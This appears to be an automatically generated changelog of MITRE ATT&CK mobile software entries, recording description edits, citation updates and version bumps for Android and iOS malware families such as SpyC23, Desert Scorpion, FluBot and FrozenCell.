SpyC23 is a mobile malware that has been used by APT-C-23 since at least 2017. SpyC23 has been observed primarily targeting Android devices in the Middle East.(Citation: welivesecurity_apt-c-23)
There are multiple close variants of SpyC23, such as VAMP(Citation: Unit42 VAMP 2017), GnatSpy(Citation: Trendmicro GnatSpy 2017), Desert Scorpion and FrozenCell, which add some additional functionality but are not significantly different from the original malware.
[S1216] TriangleDB
Current version: 1.0
Description:
TriangleDB is an Objective-C written implant deployed after Binary Validator and after root privileges are obtained during Operation Triangulation’s infection chain. Upon execution, TriangleDB communicates with the C2 server, relaying information about the victim device.(Citation: SecureList OpTriangulation 21Jun2023)
Minor Version Changes
[S0505] Desert Scorpion
Current version: 1.2
Version changed from: 1.1 → 1.2
|
|
|---|
| t | [Desert Scorpion](https://attack.mitre.org/software/S0505) i | t | [Desert Scorpion](https://attack.mitre.org/software/S0505) i |
| s surveillanceware that has targeted the Middle East, specif | | s surveillanceware that has targeted the Middle East, specif |
| ically individuals located in Palestine. [Desert Scorpion](h | | ically individuals located in Palestine. [Desert Scorpion](h |
| ttps://attack.mitre.org/software/S0505) is suspected to have | | ttps://attack.mitre.org/software/S0505) is suspected to have |
| been operated by the threat actor APT-C-23.(Citation: Looko | | been operated by the threat actor [APT-C-23](https://attack |
| ut Desert Scorpion) | | .mitre.org/groups/G1028).(Citation: Lookout Desert Scorpion) |
| | | There are multiple close variants of [Desert Scorpion](ht |
| | | tps://attack.mitre.org/software/S0505), such as VAMP(Citatio |
| | | n: Unit42 VAMP 2017), GnatSpy(Citation: Trendmicro GnatSpy 2 |
| | | 017), [FrozenCell](https://attack.mitre.org/software/S0577) |
| | | and [SpyC23](https://attack.mitre.org/software/S1195), which |
| | | add some additional functionality but are not significantly |
| | | different from the original malware. |
Details
dictionary_item_added| STIX Field | Old value | New Value |
|---|
| x_mitre_deprecated | | False |
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2021-04-19 17:11:50.159000+00:00 | 2025-01-13 17:52:20.612000+00:00 |
| description | [Desert Scorpion](https://attack.mitre.org/software/S0505) is surveillanceware that has targeted the Middle East, specifically individuals located in Palestine. [Desert Scorpion](https://attack.mitre.org/software/S0505) is suspected to have been operated by the threat actor APT-C-23.(Citation: Lookout Desert Scorpion) | [Desert Scorpion](https://attack.mitre.org/software/S0505) is surveillanceware that has targeted the Middle East, specifically individuals located in Palestine. [Desert Scorpion](https://attack.mitre.org/software/S0505) is suspected to have been operated by the threat actor [APT-C-23](https://attack.mitre.org/groups/G1028).(Citation: Lookout Desert Scorpion)
There are multiple close variants of [Desert Scorpion](https://attack.mitre.org/software/S0505), such as VAMP(Citation: Unit42 VAMP 2017), GnatSpy(Citation: Trendmicro GnatSpy 2017), [FrozenCell](https://attack.mitre.org/software/S0577) and [SpyC23](https://attack.mitre.org/software/S1195), which add some additional functionality but are not significantly different from the original malware. |
| x_mitre_attack_spec_version | 2.1.0 | 3.2.0 |
| x_mitre_version | 1.1 | 1.2 |
iterable_item_added| STIX Field | Old value | New Value |
|---|
| external_references | | {'source_name': 'Unit42 VAMP 2017', 'description': 'Bar, T., Lancaster, T. (2017, April 5). Targeted Attacks in the Middle East Using KASPERAGENT and MICROPSIA. Retrieved March 4, 2024.', 'url': 'https://unit42.paloaltonetworks.com/unit42-targeted-attacks-middle-east-using-kasperagent-micropsia/'} |
| external_references | | {'source_name': 'Trendmicro GnatSpy 2017', 'description': 'Guo, G., Xu, E. (2017, December 18). New GnatSpy Mobile Malware Family Discovered. Retrieved March 4, 2024.', 'url': 'https://www.trendmicro.com/en_us/research/17/l/new-gnatspy-mobile-malware-family-discovered.html'} |
[S1067] FluBot
Current version: 1.1
Version changed from: 1.0 → 1.1
|
|
|---|
| t | [FluBot](https://attack.mitre.org/software/S1067) is a multi | t | [FluBot](https://attack.mitre.org/software/S1067) is a multi |
| -purpose mobile banking malware that was first observed in S | | -purpose mobile banking malware that was first observed in S |
| pain in late 2020. It primarily spread through European coun | | pain in late 2020. It primarily spread through European coun |
| tries using a variety of SMS phishing messages in multiple l | | tries using a variety of SMS phishing messages in multiple l |
| anguages.(Citation: proofpoint_flubot_0421)(Citation: bitdef | | anguages.(Citation: proofpoint_flubot_0421)(Citation: bitdef |
| ender_flubot_0524) | | ender_flubot_0524) An international law enforcement operatio |
| | | n of 11 countries eventually disrupted the spread of [FluBot |
| | | ](https://attack.mitre.org/software/S1067).(Citation: Europo |
| | | l FluBot Jun2022) |
Details
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2023-03-31 23:02:48.577000+00:00 | 2025-03-27 22:35:44.281000+00:00 |
| description | [FluBot](https://attack.mitre.org/software/S1067) is a multi-purpose mobile banking malware that was first observed in Spain in late 2020. It primarily spread through European countries using a variety of SMS phishing messages in multiple languages.(Citation: proofpoint_flubot_0421)(Citation: bitdefender_flubot_0524) | [FluBot](https://attack.mitre.org/software/S1067) is a multi-purpose mobile banking malware that was first observed in Spain in late 2020. It primarily spread through European countries using a variety of SMS phishing messages in multiple languages.(Citation: proofpoint_flubot_0421)(Citation: bitdefender_flubot_0524) An international law enforcement operation of 11 countries eventually disrupted the spread of [FluBot](https://attack.mitre.org/software/S1067).(Citation: Europol FluBot Jun2022) |
| x_mitre_attack_spec_version | 3.1.0 | 3.2.0 |
| x_mitre_version | 1.0 | 1.1 |
iterable_item_added| STIX Field | Old value | New Value |
|---|
| external_references | | {'source_name': 'Europol FluBot Jun2022', 'description': 'Europol. (2022, June 1). Takedown of SMS-based FluBot spyware infecting Android phones. Retrieved April 18, 2024.', 'url': 'https://www.europol.europa.eu/media-press/newsroom/news/takedown-of-sms-based-flubot-spyware-infecting-android-phones'} |
[S0577] FrozenCell
Current version: 1.1
Version changed from: 1.0 → 1.1
|
|
|---|
| t | [FrozenCell](https://attack.mitre.org/software/S0577) is the | t | [FrozenCell](https://attack.mitre.org/software/S0577) is the |
| mobile component of a family of surveillanceware, with a co | | mobile component of a family of surveillanceware, with a co |
| rresponding desktop component known as KasperAgent and [Micr | | rresponding desktop component known as KasperAgent and [Micr |
| opsia](https://attack.mitre.org/software/S0339).(Citation: L | | opsia](https://attack.mitre.org/software/S0339).(Citation: L |
| ookout FrozenCell) | | ookout FrozenCell) There are multiple close variants of [F |
| | | rozenCell](https://attack.mitre.org/software/S0577), such as |
| | | VAMP(Citation: Unit42 VAMP 2017), GnatSpy(Citation: Trendmi |
| | | cro GnatSpy 2017), [Desert Scorpion](https://attack.mitre.or |
| | | g/software/S0505) and [SpyC23](https://attack.mitre.org/soft |
| | | ware/S1195), which add some additional functionality but are |
| | | not significantly different from the original malware. |
Details
dictionary_item_added| STIX Field | Old value | New Value |
|---|
| x_mitre_deprecated | | False |
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2021-04-19 14:07:24.519000+00:00 | 2025-02-19 17:08:24.276000+00:00 |
| description | [FrozenCell](https://attack.mitre.org/software/S0577) is the mobile component of a family of surveillanceware, with a corresponding desktop component known as KasperAgent and [Micropsia](https://attack.mitre.org/software/S0339).(Citation: Lookout FrozenCell) | [FrozenCell](https://attack.mitre.org/software/S0577) is the mobile component of a family of surveillanceware, with a corresponding desktop component known as KasperAgent and [Micropsia](https://attack.mitre.org/software/S0339).(Citation: Lookout FrozenCell)
There are multiple close variants of [FrozenCell](https://attack.mitre.org/software/S0577), such as VAMP(Citation: Unit42 VAMP 2017), GnatSpy(Citation: Trendmicro GnatSpy 2017), [Desert Scorpion](https://attack.mitre.org/software/S0505) and [SpyC23](https://attack.mitre.org/software/S1195), which add some additional functionality but are not significantly different from the original malware. |
| x_mitre_attack_spec_version | 2.1.0 | 3.2.0 |
| x_mitre_version | 1.0 | 1.1 |
iterable_item_added| STIX Field | Old value | New Value |
|---|
| external_references | | {'source_name': 'Unit42 VAMP 2017', 'description': 'Bar, T., Lancaster, T. (2017, April 5). Targeted Attacks in the Middle East Using KASPERAGENT and MICROPSIA. Retrieved March 4, 2024.', 'url': 'https://unit42.paloaltonetworks.com/unit42-targeted-attacks-middle-east-using-kasperagent-micropsia/'} |
| external_references | | {'source_name': 'Trendmicro GnatSpy 2017', 'description': 'Guo, G., Xu, E. (2017, December 18). New GnatSpy Mobile Malware Family Discovered. Retrieved March 4, 2024.', 'url': 'https://www.trendmicro.com/en_us/research/17/l/new-gnatspy-mobile-malware-family-discovered.html'} |
Patches
[S0310] ANDROIDOS_ANSERVER.A
Current version: 1.3
Details
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2022-10-24 15:09:07.609000+00:00 | 2025-04-16 21:22:08.276000+00:00 |
| x_mitre_attack_spec_version | 2.1.0 | 3.2.0 |
[S1061] AbstractEmu
Current version: 1.0
Details
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2023-04-13 22:33:55.061000+00:00 | 2025-04-16 21:22:06.208000+00:00 |
| x_mitre_attack_spec_version | 3.1.0 | 3.2.0 |
[S0309] Adups
Current version: 1.0
Details
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2022-10-24 15:09:07.609000+00:00 | 2025-04-16 21:22:15.993000+00:00 |
| x_mitre_attack_spec_version | 2.1.0 | 3.2.0 |
[S0440] Agent Smith
Current version: 1.0
Details
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2020-06-17 12:49:21.423000+00:00 | 2025-04-16 21:22:11.884000+00:00 |
| x_mitre_attack_spec_version | 2.1.0 | 3.2.0 |
[S1095] AhRat
Current version: 1.0
|
|
|---|
| t | [AhRat](https://attack.mitre.org/software/S1095) is an Andro | t | [AhRat](https://attack.mitre.org/software/S1095) is an Andro |
| id remote access tool based on the open-source AhMyth remote | | id remote access tool based on the open-source AhMyth remote |
| access tool. [AhRat](https://attack.mitre.org/software/S109 | | access tool. [AhRat](https://attack.mitre.org/software/S109 |
| 5) initially spread in August 2022 on the Google Play Store | | 5) initially spread in August 2022 on the Google Play Store |
| via an update containing malicious code to the previously be | | via an update containing malicious code to the previously be |
| nign application, “iRecorder – Screen Recorder”, which itsel | | nign application, “iRecorder – Screen Recorder,” which itsel |
| f was released in September 2021.(Citation: welivesecurity_a | | f was released in September 2021.(Citation: welivesecurity_a |
| hrat_0523) | | hrat_0523) |
Details
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2024-04-16 15:46:27.358000+00:00 | 2025-01-24 17:12:44.782000+00:00 |
| description | [AhRat](https://attack.mitre.org/software/S1095) is an Android remote access tool based on the open-source AhMyth remote access tool. [AhRat](https://attack.mitre.org/software/S1095) initially spread in August 2022 on the Google Play Store via an update containing malicious code to the previously benign application, “iRecorder – Screen Recorder”, which itself was released in September 2021.(Citation: welivesecurity_ahrat_0523) | [AhRat](https://attack.mitre.org/software/S1095) is an Android remote access tool based on the open-source AhMyth remote access tool. [AhRat](https://attack.mitre.org/software/S1095) initially spread in August 2022 on the Google Play Store via an update containing malicious code to the previously benign application, “iRecorder – Screen Recorder,” which itself was released in September 2021.(Citation: welivesecurity_ahrat_0523) |
[S0319] Allwinner
Current version: 1.0
Details
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2022-10-24 15:09:07.609000+00:00 | 2025-04-16 21:22:03.823000+00:00 |
| x_mitre_attack_spec_version | 2.1.0 | 3.2.0 |
[S0292] AndroRAT
Current version: 1.1
Details
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2024-04-16 21:01:50.792000+00:00 | 2024-11-17 20:00:53.685000+00:00 |
| external_references[3]['description'] | The404Hacking. (n.d.). AndroRAT. Retrieved April 8, 2024. | The404Hacking. (n.d.). AndroRAT. Retrieved November 17, 2024. |
| external_references[3]['url'] | https://web.archive.org/web/20221013124327/https://github.com/The404Hacking/AndroRAT | https://web.archive.org/web/20221013124327/https:/github.com/The404Hacking/AndroRAT |
[S0525] Android/AdDisplay.Ashas
Current version: 1.0
Details
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2020-10-29 19:19:08.848000+00:00 | 2025-04-16 21:22:16.304000+00:00 |
| x_mitre_attack_spec_version | 2.1.0 | 3.2.0 |
[S0304] Android/Chuli.A
Current version: 1.2
Details
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2022-10-24 15:09:07.609000+00:00 | 2025-04-16 21:22:14.103000+00:00 |
| x_mitre_attack_spec_version | 2.1.0 | 3.2.0 |
[S0524] AndroidOS/MalLocker.B
Current version: 1.0
Details
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2020-10-29 18:41:49.272000+00:00 | 2025-04-16 21:22:11.027000+00:00 |
| x_mitre_attack_spec_version | 2.1.0 | 3.2.0 |
[S0540] Asacub
Current version: 1.0
Details
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2020-12-16 20:21:43.239000+00:00 | 2025-04-16 21:22:12.041000+00:00 |
| x_mitre_attack_spec_version | 2.1.0 | 3.2.0 |
[S0293] BrainTest
Current version: 1.0
Details
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2022-04-15 15:36:43.770000+00:00 | 2025-04-16 21:22:15.215000+00:00 |
| x_mitre_attack_spec_version | 2.1.0 | 3.2.0 |
[S0432] Bread
Current version: 1.2
Details
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2023-04-21 18:53:30.817000+00:00 | 2025-04-16 21:22:04.130000+00:00 |
| x_mitre_attack_spec_version | 3.1.0 | 3.2.0 |
[S0655] BusyGasper
Current version: 1.0
Details
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2023-03-28 17:20:20.194000+00:00 | 2025-04-16 21:22:15.058000+00:00 |
| x_mitre_attack_spec_version | 3.1.0 | 3.2.0 |
[S0555] CHEMISTGAMES
Current version: 1.0
Details
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2021-03-25 16:42:05.526000+00:00 | 2025-04-16 21:22:11.340000+00:00 |
| x_mitre_attack_spec_version | 2.1.0 | 3.2.0 |
[S0529] CarbonSteal
Current version: 1.1
Details
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2021-09-20 13:54:19.819000+00:00 | 2025-04-16 21:22:03.013000+00:00 |
| x_mitre_attack_spec_version | 2.1.0 | 3.2.0 |
[S0480] Cerberus
Current version: 1.1
Details
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2020-09-11 15:43:49.079000+00:00 | 2025-04-16 21:22:03.157000+00:00 |
| x_mitre_attack_spec_version | 2.1.0 | 3.2.0 |
[S1083] Chameleon
Current version: 1.0
Details
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2023-09-26 13:30:33.039000+00:00 | 2025-04-16 21:22:06.355000+00:00 |
| x_mitre_attack_spec_version | 3.1.0 | 3.2.0 |
[S0323] Charger
Current version: 1.1
Details
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2022-10-24 15:09:07.609000+00:00 | 2025-04-16 21:22:14.258000+00:00 |
| x_mitre_attack_spec_version | 2.1.0 | 3.2.0 |
[S0602] Circles
Current version: 1.0
Details
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2021-04-26 15:33:55.798000+00:00 | 2025-04-16 21:22:13.137000+00:00 |
| x_mitre_attack_spec_version | 2.1.0 | 3.2.0 |
[S0426] Concipit1248
Current version: 1.0
Details
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2020-04-30 18:30:05.787000+00:00 | 2025-04-16 21:22:10.526000+00:00 |
| x_mitre_attack_spec_version | 2.1.0 | 3.2.0 |
[S0425] Corona Updates
Current version: 1.1
Details
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2020-09-11 15:45:38.235000+00:00 | 2025-04-16 21:22:07.148000+00:00 |
| x_mitre_attack_spec_version | 2.1.0 | 3.2.0 |
[S0479] DEFENSOR ID
Current version: 1.0
Details
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2020-06-26 20:16:31.850000+00:00 | 2025-04-16 21:22:08.935000+00:00 |
| x_mitre_attack_spec_version | 2.1.0 | 3.2.0 |
[S0301] Dendroid
Current version: 2.0
Details
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2022-10-24 15:09:07.609000+00:00 | 2025-04-16 21:22:06.526000+00:00 |
| x_mitre_attack_spec_version | 2.1.0 | 3.2.0 |
[S0550] DoubleAgent
Current version: 1.0
Details
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2021-04-19 17:05:42.253000+00:00 | 2025-04-16 21:22:07.802000+00:00 |
| x_mitre_attack_spec_version | 2.1.0 | 3.2.0 |
[S0300] DressCode
Current version: 1.0
Details
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2022-10-24 15:09:07.609000+00:00 | 2025-04-16 21:22:16.646000+00:00 |
| x_mitre_attack_spec_version | 2.1.0 | 3.2.0 |
[S1054] Drinik
Current version: 1.0
Details
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2023-04-13 22:33:34.237000+00:00 | 2024-11-17 18:11:27.761000+00:00 |
| external_references[1]['description'] | Cyble. (2022, October 27). Drinik Malware Returns With Advanced Capabilities Targeting Indian Taxpayers. Retrieved January 18, 2023. | Cyble. (2022, October 27). Drinik Malware Returns With Advanced Capabilities Targeting Indian Taxpayers. Retrieved November 17, 2024. |
| external_references[1]['url'] | https://blog.cyble.com/2022/10/27/drinik-malware-returns-with-advanced-capabilities-targeting-indian-taxpayers/ | https://web.archive.org/web/20221114031945/https://blog.cyble.com/2022/10/27/drinik-malware-returns-with-advanced-capabilities-targeting-indian-taxpayers/ |
| x_mitre_attack_spec_version | 3.1.0 | 3.2.0 |
[S0320] DroidJack
Current version: 1.2
Details
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2022-05-20 17:13:16.506000+00:00 | 2025-04-16 21:22:03.310000+00:00 |
| x_mitre_attack_spec_version | 2.1.0 | 3.2.0 |
[S0315] DualToy
Current version: 1.0
Details
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2022-10-24 15:09:07.609000+00:00 | 2025-04-16 21:22:08.432000+00:00 |
| x_mitre_attack_spec_version | 2.1.0 | 3.2.0 |
[S0420] Dvmap
Current version: 1.0
Details
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2020-01-22 22:17:23.015000+00:00 | 2025-04-16 21:22:05.219000+00:00 |
| x_mitre_attack_spec_version | 2.1.0 | 3.2.0 |
[S0478] EventBot
Current version: 1.0
Details
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2020-06-26 21:01:58.595000+00:00 | 2025-04-16 21:22:12.346000+00:00 |
| x_mitre_attack_spec_version | 2.1.0 | 3.2.0 |
[S0405] Exodus
Current version: 1.0
Details
dictionary_item_added| STIX Field | Old value | New Value |
|---|
| x_mitre_deprecated | | False |
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2019-10-14 17:15:52.191000+00:00 | 2024-11-17 18:31:54.806000+00:00 |
| external_references[3]['description'] | Security Without Borders. (2019, March 29). Exodus: New Android Spyware Made in Italy. Retrieved September 3, 2019. | Security Without Borders. (2019, March 29). Exodus: New Android Spyware Made in Italy. Retrieved November 17, 2024. |
| external_references[3]['url'] | https://securitywithoutborders.org/blog/2019/03/29/exodus.html | https://web.archive.org/web/20200314194610/https://securitywithoutborders.org/blog/2019/03/29/exodus.html |
| x_mitre_attack_spec_version | 2.1.0 | 3.2.0 |
[S0509] FakeSpy
Current version: 1.0
Details
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2020-10-06 20:09:57.659000+00:00 | 2025-04-16 21:22:10.213000+00:00 |
| x_mitre_attack_spec_version | 2.1.0 | 3.2.0 |
[S0408] FlexiSpy
Current version: 1.0
Details
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2019-10-14 18:08:28.349000+00:00 | 2025-04-16 21:22:17.243000+00:00 |
| x_mitre_attack_spec_version | 2.1.0 | 3.2.0 |
[S0536] GPlayed
Current version: 1.0
Details
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2020-11-24 17:55:12.561000+00:00 | 2025-04-16 21:22:12.191000+00:00 |
| x_mitre_attack_spec_version | 2.1.0 | 3.2.0 |
[S0423] Ginp
Current version: 1.1
Details
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2020-09-11 15:50:18.707000+00:00 | 2025-04-16 21:22:09.244000+00:00 |
| x_mitre_attack_spec_version | 2.1.0 | 3.2.0 |
[S0535] Golden Cup
Current version: 1.0
Details
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2020-12-22 21:48:10.951000+00:00 | 2025-04-16 21:22:15.703000+00:00 |
| x_mitre_attack_spec_version | 2.1.0 | 3.2.0 |
[S0551] GoldenEagle
Current version: 1.0
Details
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2021-03-25 16:20:28.165000+00:00 | 2025-04-16 21:22:03.977000+00:00 |
| x_mitre_attack_spec_version | 2.1.0 | 3.2.0 |
[S0421] GolfSpy
Current version: 1.0
Details
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2020-03-26 20:50:07.023000+00:00 | 2025-04-16 21:22:12.846000+00:00 |
| x_mitre_attack_spec_version | 2.1.0 | 3.2.0 |
[S0290] Gooligan
Current version: 1.2
Details
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2022-10-24 15:09:07.609000+00:00 | 2025-04-16 21:22:04.607000+00:00 |
| x_mitre_attack_spec_version | 2.1.0 | 3.2.0 |
[S0406] Gustuff
Current version: 1.0
Details
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2019-10-14 19:14:17.007000+00:00 | 2025-04-16 21:22:16.804000+00:00 |
| x_mitre_attack_spec_version | 2.1.0 | 3.2.0 |
[S0544] HenBox
Current version: 1.0
Details
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2021-04-12 03:02:06.792000+00:00 | 2025-04-16 21:22:12.500000+00:00 |
| x_mitre_attack_spec_version | 2.1.0 | 3.2.0 |
[S0322] HummingBad
Current version: 1.1
Details
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2023-04-21 18:52:08.966000+00:00 | 2025-04-16 21:22:13.785000+00:00 |
| x_mitre_attack_spec_version | 3.1.0 | 3.2.0 |
[S0321] HummingWhale
Current version: 1.0
Details
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2022-10-24 15:09:07.609000+00:00 | 2025-04-16 21:22:09.395000+00:00 |
| x_mitre_attack_spec_version | 2.1.0 | 3.2.0 |
[S0463] INSOMNIA
Current version: 1.0
Details
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2020-06-24 18:24:35.433000+00:00 | 2025-04-16 21:22:05.067000+00:00 |
| x_mitre_attack_spec_version | 2.1.0 | 3.2.0 |
[S0325] Judy
Current version: 1.0
Details
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2022-10-24 15:09:07.609000+00:00 | 2025-04-16 21:22:04.284000+00:00 |
| x_mitre_attack_spec_version | 2.1.0 | 3.2.0 |
[S0288] KeyRaider
Current version: 1.0
Details
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2022-10-24 15:09:07.609000+00:00 | 2025-04-16 21:22:07.456000+00:00 |
| x_mitre_attack_spec_version | 2.1.0 | 3.2.0 |
[S0485] Mandrake
Current version: 1.0
Details
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2020-09-11 15:52:12.097000+00:00 | 2025-04-16 21:22:08.595000+00:00 |
| x_mitre_attack_spec_version | 2.1.0 | 3.2.0 |
[S0303] MazarBOT
Current version: 1.0
Details
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2022-10-24 15:09:07.609000+00:00 | 2025-04-16 21:22:09.084000+00:00 |
| x_mitre_attack_spec_version | 2.1.0 | 3.2.0 |
[S0407] Monokle
Current version: 1.2
Details
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2021-11-01 18:30:41.998000+00:00 | 2025-04-16 21:22:09.753000+00:00 |
| x_mitre_attack_spec_version | 2.1.0 | 3.2.0 |
[S0299] NotCompatible
Current version: 1.0
Details
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2022-10-24 15:09:07.609000+00:00 | 2025-04-16 21:22:05.573000+00:00 |
| x_mitre_attack_spec_version | 2.1.0 | 3.2.0 |
[S0286] OBAD
Current version: 1.0
Details
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2022-10-24 15:09:07.609000+00:00 | 2025-04-16 21:22:13.949000+00:00 |
| x_mitre_attack_spec_version | 2.1.0 | 3.2.0 |
[S0285] OldBoot
Current version: 1.0
Details
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2022-10-24 15:09:07.609000+00:00 | 2025-04-16 21:22:04.440000+00:00 |
| x_mitre_attack_spec_version | 2.1.0 | 3.2.0 |
[S0291] PJApps
Current version: 1.0
Details
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2022-10-24 15:09:07.609000+00:00 | 2025-04-16 21:22:13.454000+00:00 |
| x_mitre_attack_spec_version | 2.1.0 | 3.2.0 |
[S0399] Pallas
Current version: 1.1
Details
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2019-09-18 20:17:17.744000+00:00 | 2025-04-16 21:22:12.993000+00:00 |
| x_mitre_attack_spec_version | 2.1.0 | 3.2.0 |
[S0316] Pegasus for Android
Current version: 1.2
Details
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2022-10-24 15:09:07.609000+00:00 | 2025-04-16 21:22:10.874000+00:00 |
| x_mitre_attack_spec_version | 2.1.0 | 3.2.0 |
[S1126] Phenakite
Current version: 1.0
Details
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2024-04-17 14:17:42.833000+00:00 | 2024-11-17 20:01:55.807000+00:00 |
| external_references[1]['description'] | Flossman, M., Scott, M. (2021, April). Technical Paper // Taking Action Against Arid Viper. Retrieved March 4, 2024. | Flossman, M., Scott, M. (2021, April). Technical Paper // Taking Action Against Arid Viper. Retrieved November 17, 2024. |
| external_references[1]['url'] | https://web.archive.org/web/20231126111812/https://about.fb.com/wp-content/uploads/2021/04/Technical-threat-report-Arid-Viper-April-2021.pdf | https://web.archive.org/web/20231126111812/https:/about.fb.com/wp-content/uploads/2021/04/Technical-threat-report-Arid-Viper-April-2021.pdf |
[S0295] RCSAndroid
Current version: 1.2
Details
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2022-10-24 15:09:07.609000+00:00 | 2025-04-16 21:22:06.991000+00:00 |
| x_mitre_attack_spec_version | 2.1.0 | 3.2.0 |
[S0539] Red Alert 2.0
Current version: 1.0
Details
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2020-12-16 20:52:20.822000+00:00 | 2025-04-16 21:22:09.903000+00:00 |
| x_mitre_attack_spec_version | 2.1.0 | 3.2.0 |
[S0326] RedDrop
Current version: 1.2
Details
dictionary_item_added| STIX Field | Old value | New Value |
|---|
| x_mitre_deprecated | | False |
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2022-10-24 15:09:07.609000+00:00 | 2024-11-17 14:24:44.696000+00:00 |
| external_references[2]['description'] | Nell Campbell. (2018, February 27). RedDrop: the blackmailing mobile malware family lurking in app stores. Retrieved September 18, 2018. | Nell Campbell. (2018, February 27). RedDrop: the blackmailing mobile malware family lurking in app stores. Retrieved November 17, 2024. |
| external_references[2]['url'] | https://www.wandera.com/reddrop-malware/ | https://web.archive.org/web/20180618225805/https://www.wandera.com/reddrop-malware/ |
| x_mitre_attack_spec_version | 2.1.0 | 3.2.0 |
[S0403] Riltok
Current version: 1.0
Details
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2019-09-18 13:44:13.080000+00:00 | 2025-04-16 21:22:12.694000+00:00 |
| x_mitre_attack_spec_version | 2.1.0 | 3.2.0 |
[S0411] Rotexy
Current version: 1.1
Details
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2020-09-11 15:53:38.216000+00:00 | 2025-04-16 21:22:03.463000+00:00 |
| x_mitre_attack_spec_version | 2.1.0 | 3.2.0 |
[S0313] RuMMS
Current version: 1.0
Details
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2022-10-24 15:09:07.609000+00:00 | 2025-04-16 21:22:10.719000+00:00 |
| x_mitre_attack_spec_version | 2.1.0 | 3.2.0 |
[S1062] S.O.V.A.
Current version: 1.0
Details
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2023-04-13 22:32:16.509000+00:00 | 2025-04-16 21:22:08.121000+00:00 |
| x_mitre_attack_spec_version | 3.1.0 | 3.2.0 |
[S1055] SharkBot
Current version: 1.0
Details
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2023-02-28 21:05:57.018000+00:00 | 2025-04-16 21:22:11.187000+00:00 |
| x_mitre_attack_spec_version | 3.1.0 | 3.2.0 |
[S0294] ShiftyBug
Current version: 1.0
Details
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2022-10-24 15:09:07.609000+00:00 | 2025-04-16 21:22:13.608000+00:00 |
| x_mitre_attack_spec_version | 2.1.0 | 3.2.0 |
[S0549] SilkBean
Current version: 1.0
Details
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2021-04-19 14:29:45.809000+00:00 | 2025-04-16 21:22:14.758000+00:00 |
| x_mitre_attack_spec_version | 2.1.0 | 3.2.0 |
[S0419] SimBad
Current version: 1.0
Details
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2020-01-27 17:01:31.634000+00:00 | 2025-04-16 21:22:16.143000+00:00 |
| x_mitre_attack_spec_version | 2.1.0 | 3.2.0 |
[S0327] Skygofree
Current version: 1.2
Details
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2022-10-24 15:09:07.609000+00:00 | 2025-04-16 21:22:07.299000+00:00 |
| x_mitre_attack_spec_version | 2.1.0 | 3.2.0 |
[S0324] SpyDealer
Current version: 1.2
Details
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2022-10-24 15:09:07.609000+00:00 | 2025-04-16 21:22:10.366000+00:00 |
| x_mitre_attack_spec_version | 2.1.0 | 3.2.0 |
